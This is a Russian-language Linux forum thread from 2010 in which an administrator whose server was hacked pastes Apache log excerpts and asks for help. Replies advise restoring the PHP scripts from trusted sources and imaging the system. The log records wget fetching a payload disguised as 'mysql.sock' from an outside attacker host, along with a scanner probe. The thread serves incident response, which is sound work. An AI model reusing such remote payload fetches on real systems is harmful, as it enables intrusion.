LINUX.ORG.RU
ФорумAdmin

Взломали сервер, помогите разобраться в уязвимости


0

0

логи messages и secure стерли
Взлом предположительно произошел сегодня в ~11 часов

в логах HTTP есть такое
-------------------------------------------------------------
[Thu Aug 26 03:50:16 2010] [error] [client 109.87.71.111] Attempt to serve directory: /var/www/html/
--11:09:12-- http://lipozor.go.ro/mysql.sock
Resolving lipozor.go.ro... [Thu Aug 26 11:09:13 2010] [error] [client 62.103.39.74] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
81.196.20.134
Connecting to lipozor.go.ro|81.196.20.134|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29674 (29K) [text/plain]
Saving to: `mysql.sock'

0K .......... .......... ........ 100% 176K=0.2s

11:09:13 (176 KB/s) - `mysql.sock' saved [29674/29674]

--11:13:07-- http://lipozor.go.ro/mysql.sock
Resolving lipozor.go.ro... 81.196.20.134
Connecting to lipozor.go.ro|81.196.20.134|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29674 (29K) [text/plain]
Saving to: `mysql.sock.1'

0K .......... .......... ........ 100% 174K=0.2s

11:13:08 (174 KB/s) - `mysql.sock.1' saved [29674/29674]
-------------------------------------------------------------

Подскажите, что это и как от этого защищаться?

Ответ на: комментарий от Deleted

на сервере серьезный бизнес проект, скриптов и сайтов ДОФИГА, на PHP это что все нужно переделывать? есть бекапы некоторого контента. но не все.

samson_b
() автор топика
Ответ на: комментарий от samson_b

на сервере серьезный бизнес проект, скриптов и сайтов ДОФИГА, на PHP это что все нужно переделывать?

В скрипты злоумышленником легко могла быть добавлена какая-нибудь кака, через которую тебя могут снова поломать даже после переустановки остального серверного ПО. Так что все эти скрипты нужно брать из другого источника: у разработчиков, из бекапов и т.п.

есть бекапы некоторого контента. но не все.

Плохо.

Deleted
()
Ответ на: комментарий от Chu

нанять чуваков вычистить свои бирюльки, почему нет? Образ системы снимать прямо сейчас, вытаскивать данные после исправления или во время. Угроза шантажа, конечно, присутствует, но шантаж не должен быть выгоден обеим сторонам. Кому в голову придёт работать с шантажистами?

spunky ★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.